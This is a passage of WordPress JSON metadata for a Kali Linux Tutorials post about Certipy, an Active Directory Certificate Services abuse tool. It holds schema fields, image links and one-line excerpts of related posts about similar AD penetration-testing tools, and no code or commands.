minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/kalilinuxtutorials.com\/certipy\/#article","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/certipy\/"},"author":{"name":"R K","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad"},"headline":"Certipy : Python Implementation For Active Directory Certificate Abuse","datePublished":"2021-11-29T15:30:04+00:00","dateModified":"2021-11-29T15:30:08+00:00","mainEntityOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/certipy\/"},"wordCount":1455,"commentCount":0,"publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/certipy\/#primaryimage"},"thumbnailUrl":"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEg3sUJOtECI-8uHdvFxy8_2Su7ZusmuSNXs7txzYdzE0ixl3sEPfGaZBOzuE7IqilBuUIhA5fbO_II1c_QCD9lk7ymmVqdZn4GmvegOnvmtwFFvM0U_xFB8M0xfp-rk-y9DwQSNcGd7658SSS-T2WiSggfpCRJChlXwkaMeJaUWhvMXwfseA6IZ6nmN=s728","keywords":["Active Directory Certificate Abuse","Certipy","Python"],"articleSection":["Kali Linux"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/kalilinuxtutorials.com\/certipy\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/kalilinuxtutorials.com\/certipy\/","url":"https:\/\/kalilinuxtutorials.com\/certipy\/","name":"Certipy : Python Implementation For Active Directory Certificate Abuse","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/certipy\/#primaryimage"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/certipy\/#primaryimage"},"thumbnailUrl":"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEg3sUJOtECI-8uHdvFxy8_2Su7ZusmuSNXs7txzYdzE0ixl3sEPfGaZBOzuE7IqilBuUIhA5fbO_II1c_QCD9lk7ymmVqdZn4GmvegOnvmtwFFvM0U_xFB8M0xfp-rk-y9DwQSNcGd7658SSS-T2WiSggfpCRJChlXwkaMeJaUWhvMXwfseA6IZ6nmN=s728","datePublished":"2021-11-29T15:30:04+00:00","dateModified":"2021-11-29T15:30:08+00:00","description":"Certipy is a Python tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS).","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/kalilinuxtutorials.com\/certipy\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/certipy\/#primaryimage","url":"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEg3sUJOtECI-8uHdvFxy8_2Su7ZusmuSNXs7txzYdzE0ixl3sEPfGaZBOzuE7IqilBuUIhA5fbO_II1c_QCD9lk7ymmVqdZn4GmvegOnvmtwFFvM0U_xFB8M0xfp-rk-y9DwQSNcGd7658SSS-T2WiSggfpCRJChlXwkaMeJaUWhvMXwfseA6IZ6nmN=s728","contentUrl":"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEg3sUJOtECI-8uHdvFxy8_2Su7ZusmuSNXs7txzYdzE0ixl3sEPfGaZBOzuE7IqilBuUIhA5fbO_II1c_QCD9lk7ymmVqdZn4GmvegOnvmtwFFvM0U_xFB8M0xfp-rk-y9DwQSNcGd7658SSS-T2WiSggfpCRJChlXwkaMeJaUWhvMXwfseA6IZ6nmN=s728","width":"728","height":"380"},{"@type":"WebSite","@id":"https:\/\/kalilinuxtutorials.com\/#website","url":"https:\/\/kalilinuxtutorials.com\/","name":"Kali Linux Tutorials","description":"Kali Linux Tutorials","publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/kalilinuxtutorials.com\/#organization","name":"Kali Linux Tutorials","url":"https:\/\/kalilinuxtutorials.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/","url":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","contentUrl":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","width":272,"height":90,"caption":"Kali Linux Tutorials"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/CyberEdition","https:\/\/www.threads.com\/@cybersecurityedition","https:\/\/www.linkedin.com\/company\/cyberedition","https:\/\/www.instagram.com\/cybersecurityedition\/"]},{"@type":"Person","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad","name":"R K","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g","caption":"R K"},"url":"https:\/\/kalilinuxtutorials.com\/author\/ranjith\/"}]}},"jetpack_featured_media_url":"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEg3sUJOtECI-8uHdvFxy8_2Su7ZusmuSNXs7txzYdzE0ixl3sEPfGaZBOzuE7IqilBuUIhA5fbO_II1c_QCD9lk7ymmVqdZn4GmvegOnvmtwFFvM0U_xFB8M0xfp-rk-y9DwQSNcGd7658SSS-T2WiSggfpCRJChlXwkaMeJaUWhvMXwfseA6IZ6nmN=s728","jetpack_sharing_enabled":true,"jetpack-related-posts":[{"id":29971,"url":"https:\/\/kalilinuxtutorials.com\/adcskiller\/","url_meta":{"origin":20530,"position":0},"title":"ADCSKiller &#8211; An ADCS Exploitation Automation Tool","author":"Varshini","date":"September 4, 2023","format":false,"excerpt":"ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages the features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure. Please note that the ADCSKiller is currently in its first draft and will undergo\u2026","rel":"","context":"In &quot;Exploitation Tools&quot;","block_context":{"text":"Exploitation Tools","link":"https:\/\/kalilinuxtutorials.com\/category\/et\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi5SbFtT_UEIYRb7MB6E7WfcS-nZLP71KE7Gol-2BkqZx4cb3KXwCSsk9xBO9cJXmI_w_KYF9mgFTGSfQ-sG9DnWrr8mmql0TDtUD6eEJvqmGVJejC0320pTc8-TxNqXa3s_pRWcO83DJEV6SwHYc_UQjYbxdohSAaGqB7uq3exaYrijJhk3NEyDcsyYJno\/s16000\/OWASP%20WrongSecrets%20-%20Multi-Tenant%20CTF%20Party%20Setup%20%281%29.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi5SbFtT_UEIYRb7MB6E7WfcS-nZLP71KE7Gol-2BkqZx4cb3KXwCSsk9xBO9cJXmI_w_KYF9mgFTGSfQ-sG9DnWrr8mmql0TDtUD6eEJvqmGVJejC0320pTc8-TxNqXa3s_pRWcO83DJEV6SwHYc_UQjYbxdohSAaGqB7uq3exaYrijJhk3NEyDcsyYJno\/s16000\/OWASP%20WrongSecrets%20-%20Multi-Tenant%20CTF%20Party%20Setup%20%281%29.webp?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi5SbFtT_UEIYRb7MB6E7WfcS-nZLP71KE7Gol-2BkqZx4cb3KXwCSsk9xBO9cJXmI_w_KYF9mgFTGSfQ-sG9DnWrr8mmql0TDtUD6eEJvqmGVJejC0320pTc8-TxNqXa3s_pRWcO83DJEV6SwHYc_UQjYbxdohSAaGqB7uq3exaYrijJhk3NEyDcsyYJno\/s16000\/OWASP%20WrongSecrets%20-%20Multi-Tenant%20CTF%20Party%20Setup%20%281%29.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi5SbFtT_UEIYRb7MB6E7WfcS-nZLP71KE7Gol-2BkqZx4cb3KXwCSsk9xBO9cJXmI_w_KYF9mgFTGSfQ-sG9DnWrr8mmql0TDtUD6eEJvqmGVJejC0320pTc8-TxNqXa3s_pRWcO83DJEV6SwHYc_UQjYbxdohSAaGqB7uq3exaYrijJhk3NEyDcsyYJno\/s16000\/OWASP%20WrongSecrets%20-%20Multi-Tenant%20CTF%20Party%20Setup%20%281%29.webp?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":36223,"url":"https:\/\/kalilinuxtutorials.com\/hackthebox-ad-machines\/","url_meta":{"origin":20530,"position":1},"title":"HackTheBox AD Machines : Tools And Strategies For Mastering AD Penetration Testing","author":"Varshini","date":"February 7, 2025","format":false,"excerpt":"HackTheBox (HTB) offers a range of Active Directory (AD) machines designed to help cybersecurity enthusiasts and professionals practice enumeration, exploitation, and attack techniques on AD environments. These machines vary in difficulty, providing challenges for both beginners and advanced users. Below is an overview of tools commonly used for tackling AD\u2026","rel":"","context":"In &quot;Cyber security&quot;","block_context":{"text":"Cyber security","link":"https:\/\/kalilinuxtutorials.com\/category\/cyber-security\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/02\/HackTheBox-AD-Machines.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/02\/HackTheBox-AD-Machines.webp?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/02\/HackTheBox-AD-Machines.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/02\/HackTheBox-AD-Machines.webp?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/02\/HackTheBox-AD-Machines.webp?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/02\/HackTheBox-AD-Machines.webp?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":26760,"url":"https:\/\/kalilinuxtutorials.com\/masky\/","url_meta":{"origin":20530,"position":2},"title":"Masky : Python Library With CLI Allowing To Remotely Dump Domain User Credentials Via An ADCS","author":"R K","date":"September 9, 2022","format":false,"excerpt":"Masky is a python library providing an alternative way to remotely dump domain users' credentials thanks to an ADCS. A command line tool has been built on top of this library in order to easily gather PFX, NT hashes and TGT on a larger scope. This tool does not exploit\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi613ZRJi8M2dKw6VGvbn4P7TjfU9GiDsiM-WGtecg3AWHtJfklXdvAPtTFNGwSKEuQrXRW4zQjaTQNT3bZy6nFOSz-2sxe8uHxso5ar00gSzQADKFw68yYgGxQw_chr_uKIWUSL74Dl5f-NDvOToMN-Wqdp45YXO9UThShzn1m4u8DMZiVQ3rhUl4Y\/s728\/download.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi613ZRJi8M2dKw6VGvbn4P7TjfU9GiDsiM-WGtecg3AWHtJfklXdvAPtTFNGwSKEuQrXRW4zQjaTQNT3bZy6nFOSz-2sxe8uHxso5ar00gSzQADKFw68yYgGxQw_chr_uKIWUSL74Dl5f-NDvOToMN-Wqdp45YXO9UThShzn1m4u8DMZiVQ3rhUl4Y\/s728\/download.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi613ZRJi8M2dKw6VGvbn4P7TjfU9GiDsiM-WGtecg3AWHtJfklXdvAPtTFNGwSKEuQrXRW4zQjaTQNT3bZy6nFOSz-2sxe8uHxso5ar00gSzQADKFw68yYgGxQw_chr_uKIWUSL74Dl5f-NDvOToMN-Wqdp45YXO9UThShzn1m4u8DMZiVQ3rhUl4Y\/s728\/download.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi613ZRJi8M2dKw6VGvbn4P7TjfU9GiDsiM-WGtecg3AWHtJfklXdvAPtTFNGwSKEuQrXRW4zQjaTQNT3bZy6nFOSz-2sxe8uHxso5ar00gSzQADKFw68yYgGxQw_chr_uKIWUSL74Dl5f-NDvOToMN-Wqdp45YXO9UThShzn1m4u8DMZiVQ3rhUl4Y\/s728\/download.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":32058,"url":"https:\/\/kalilinuxtutorials.com\/linwinpwn-2\/","url_meta":{"origin":20530,"position":3},"title":"linWinPwn &#8211; Active Directory Vulnerability Scanner","author":"Varshini","date":"February 15, 2024","format":false,"excerpt":"A versatile bash script designed for automating Active Directory enumeration and vulnerability assessment. By leveraging a curated selection of tools and employing clever techniques like dynamic port forwarding, linWinPwn streamlines the process of gathering evidence in AD environments. Whether you're working against time constraints or aiming to minimize footprint, this\u2026","rel":"","context":"In &quot;Cyber security&quot;","block_context":{"text":"Cyber security","link":"https:\/\/kalilinuxtutorials.com\/category\/cyber-security\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEir68Esfbhp-tbg8DKcENoYMMWL1-QfkPn2T38qDrNrg7VjQDeHUr1Rfm2YNFa-PV6lMuNkOhyHERZPYc-bE18NIQN7Crm2vBugDaI8EcKk0xKTTzrRwP-nmb__nrEsH08MwtJ8bBw4F2Ifqwn9QapXykbg8xDXYTeU0XeMTxHXNFx04LV70yduDJ7uoTUT\/s16000\/Untitled%20design%20%2821%29.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEir68Esfbhp-tbg8DKcENoYMMWL1-QfkPn2T38qDrNrg7VjQDeHUr1Rfm2YNFa-PV6lMuNkOhyHERZPYc-bE18NIQN7Crm2vBugDaI8EcKk0xKTTzrRwP-nmb__nrEsH08MwtJ8bBw4F2Ifqwn9QapXykbg8xDXYTeU0XeMTxHXNFx04LV70yduDJ7uoTUT\/s16000\/Untitled%20design%20%2821%29.webp?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEir68Esfbhp-tbg8DKcENoYMMWL1-QfkPn2T38qDrNrg7VjQDeHUr1Rfm2YNFa-PV6lMuNkOhyHERZPYc-bE18NIQN7Crm2vBugDaI8EcKk0xKTTzrRwP-nmb__nrEsH08MwtJ8bBw4F2Ifqwn9QapXykbg8xDXYTeU0XeMTxHXNFx04LV70yduDJ7uoTUT\/s16000\/Untitled%20design%20%2821%29.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEir68Esfbhp-tbg8DKcENoYMMWL1-QfkPn2T38qDrNrg7VjQDeHUr1Rfm2YNFa-PV6lMuNkOhyHERZPYc-bE18NIQN7Crm2vBugDaI8EcKk0xKTTzrRwP-nmb__nrEsH08MwtJ8bBw4F2Ifqwn9QapXykbg8xDXYTeU0XeMTxHXNFx04LV70yduDJ7uoTUT\/s16000\/Untitled%20design%20%2821%29.webp?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEir68Esfbhp-tbg8DKcENoYMMWL1-QfkPn2T38qDrNrg7VjQDeHUr1Rfm2YNFa-PV6lMuNkOhyHERZPYc-bE18NIQN7Crm2vBugDaI8EcKk0xKTTzrRwP-nmb__nrEsH08MwtJ8bBw4F2Ifqwn9QapXykbg8xDXYTeU0XeMTxHXNFx04LV70yduDJ7uoTUT\/s16000\/Untitled%20design%20%2821%29.webp?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEir68Esfbhp-tbg8DKcENoYMMWL1-QfkPn2T38qDrNrg7VjQDeHUr1Rfm2YNFa-PV6lMuNkOhyHERZPYc-bE18NIQN7Crm2vBugDaI8EcKk0xKTTzrRwP-nmb__nrEsH08MwtJ8bBw4F2Ifqwn9QapXykbg8xDXYTeU0XeMTxHXNFx04LV70yduDJ7uoTUT\/s16000\/Untitled%20design%20%2821%29.webp?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":31774,"url":"https:\/\/kalilinuxtutorials.com\/gssapi-abuse\/","url_meta":{"origin":20530,"position":4},"title":"GSSAPI-Abuse : Leveraging Kerberos Stacks For Authentication Abuse","author":"Varshini","date":"January 22, 2024","format":false,"excerpt":"gssapi-abuse was released as part of my DEF CON 31 talk. A full write up on the abuse vector can be found here:\u00a0A Broken Marriage: Abusing Mixed Vendor Kerberos Stacks The tool has two features. The first is the ability to enumerate non Windows hosts that are joined to Active\u2026","rel":"","context":"In &quot;Cyber security&quot;","block_context":{"text":"Cyber security","link":"https:\/\/kalilinuxtutorials.com\/category\/cyber-security\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg3L2mamKtUpUYzY9fDZb7mUlgHTLDgOmmLQ_2NYneqRST5B62kO4HUoLh5ZeFuFQsrZ0-pfDHpeOspZDLtkk2Z4URpEpqa59bgglsuzQO99S8-F02J79ygekL3ixP9R5d5i9viv2zftfhTOt4OJVkZOzjC2SymBOEKMnN69zTtR9ngxmdfycXqs1SU_yj4\/s16000\/Untitled%20design%20%281%29.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg3L2mamKtUpUYzY9fDZb7mUlgHTLDgOmmLQ_2NYneqRST5B62kO4HUoLh5ZeFuFQsrZ0-pfDHpeOspZDLtkk2Z4URpEpqa59bgglsuzQO99S8-F02J79ygekL3ixP9R5d5i9viv2zftfhTOt4OJVkZOzjC2SymBOEKMnN69zTtR9ngxmdfycXqs1SU_yj4\/s16000\/Untitled%20design%20%281%29.webp?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg3L2mamKtUpUYzY9fDZb7mUlgHTLDgOmmLQ_2NYneqRST5B62kO4HUoLh5ZeFuFQsrZ0-pfDHpeOspZDLtkk2Z4URpEpqa59bgglsuzQO99S8-F02J79ygekL3ixP9R5d5i9viv2zftfhTOt4OJVkZOzjC2SymBOEKMnN69zTtR9ngxmdfycXqs1SU_yj4\/s16000\/Untitled%20design%20%281%29.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg3L2mamKtUpUYzY9fDZb7mUlgHTLDgOmmLQ_2NYneqRST5B62kO4HUoLh5ZeFuFQsrZ0-pfDHpeOspZDLtkk2Z4URpEpqa59bgglsuzQO99S8-F02J79ygekL3ixP9R5d5i9viv2zftfhTOt4OJVkZOzjC2SymBOEKMnN69zTtR9ngxmdfycXqs1SU_yj4\/s16000\/Untitled%20design%20%281%29.webp?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg3L2mamKtUpUYzY9fDZb7mUlgHTLDgOmmLQ_2NYneqRST5B62kO4HUoLh5ZeFuFQsrZ0-pfDHpeOspZDLtkk2Z4URpEpqa59bgglsuzQO99S8-F02J79ygekL3ixP9R5d5i9viv2zftfhTOt4OJVkZOzjC2SymBOEKMnN69zTtR9ngxmdfycXqs1SU_yj4\/s16000\/Untitled%20design%20%281%29.webp?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg3L2mamKtUpUYzY9fDZb7mUlgHTLDgOmmLQ_2NYneqRST5B62kO4HUoLh5ZeFuFQsrZ0-pfDHpeOspZDLtkk2Z4URpEpqa59bgglsuzQO99S8-F02J79ygekL3ixP9R5d5i9viv2zftfhTOt4OJVkZOzjC2SymBOEKMnN69zTtR9ngxmdfycXqs1SU_yj4\/s16000\/Untitled%20design%20%281%29.webp?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":28098,"url":"https:\/\/kalilinuxtutorials.com\/autobloody\/","url_meta":{"origin":20530,"position":5},"title":"Autobloody : Tool To Automatically Exploit Active Directory Privilege Escalation Paths Shown By BloodHound","author":"R K","date":"January 3, 2023","format":false,"excerpt":"Autobloody is a tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound. Description This tool automates the AD privesc between two AD objects, the source (the one we own) and the target (the one we want) if a privesc path exists in BloodHound database. The automation is\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEh7cWl56r2h8DBy_HcxWxzaTu1aElg-Vs3aDsV4nRODxfyId17snJbflkl55-vGRyJ9obbT4WHIdglszrNUHgBtSfYSYEgrqezqJ_oIxYIdLMXa6tv4jrsM7eOGWSxTeqrrQo9cY9dnsT7R-9wi-fmL1NM76elorCuYfYS06etmWth81r4AgK7rkPBq\/s728\/autobloody%281%29.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEh7cWl56r2h8DBy_HcxWxzaTu1aElg-Vs3aDsV4nRODxfyId17snJbflkl55-vGRyJ9obbT4WHIdglszrNUHgBtSfYSYEgrqezqJ_oIxYIdLMXa6tv4jrsM7eOGWSxTeqrrQo9cY9dnsT7R-9wi-fmL1NM76elorCuYfYS06etmWth81r4AgK7rkPBq\/s728\/autobloody%281%29.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEh7cWl56r2h8DBy_HcxWxzaTu1aElg-Vs3aDsV4nRODxfyId17snJbflkl55-vGRyJ9obbT4WHIdglszrNUHgBtSfYSYEgrqezqJ_oIxYIdLMXa6tv4jrsM7eOGWSxTeqrrQo9cY9dnsT7R-9wi-fmL1NM76elorCuYfYS06etmWth81r4AgK7rkPBq\/s728\/autobloody%281%29.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEh7cWl56r2h8DBy_HcxWxzaTu1aElg-Vs3aDsV4nRODxfyId17snJbflkl55-vGRyJ9obbT4WHIdglszrNUHgBtSfYSYEgrqezqJ_oIxYIdLMXa6tv4jrsM7eOGWSxTeqrrQo9cY9dnsT7R-9wi-fmL1NM76elorCuYfYS06etmWth81r4AgK7rkPBq\/s728\/autobloody%281%29.png?resize=700%2C400&ssl=1 2x"},"classes":[]}],"_links":{"self":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/20530","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/comments?post=20530"}],"version-history":[{"count":16,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/20530\/revisions"}],"predecessor-version":[{"id":20630,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/20530\/revisions\/20630"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media\/20546"}],"wp:attachment":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media?parent=20530"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/categories?post=20530"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/tags?post=20530"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}